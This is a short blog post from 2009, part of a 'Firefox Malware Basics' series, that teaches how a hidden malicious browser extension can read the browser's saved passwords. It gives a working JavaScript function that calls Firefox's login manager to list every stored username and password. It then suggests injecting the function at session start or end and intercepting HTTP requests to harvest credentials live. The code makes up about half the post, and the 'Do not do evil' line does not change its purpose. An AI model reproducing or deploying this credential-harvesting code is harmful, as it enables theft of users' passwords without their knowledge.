Firefox Malware Basics – Part 2 – Show me the passwords
by log0 on February 21st, 2009
Now that our extension can hide, what more can it do? If you thought showing passwords in Firefox is difficult, it is not. Do not do evil, but here is the simple script to do it :
function fetch_passwords()
{
var passwordManager = Components.classes["@mozilla.org/login-manager;1"]
.getService(Components.interfaces.nsILoginManager);
var items = passwordManager.getAllLogins({});
for ( var i=0; i<items.length; ++i )
{
alert(items[i].username);
alert(items[i].password);
}
}
The interface nsILoginManager is the password manager we all have been using. The above, when injected periodically or at the start or end of a browser session, can really give you a lot of fruitful stuffs. Of course, if you wish to get real time information on the fly, intercept HTTP and extract the HTTP request and dump all the variables!
—
References :
English
Recent Comments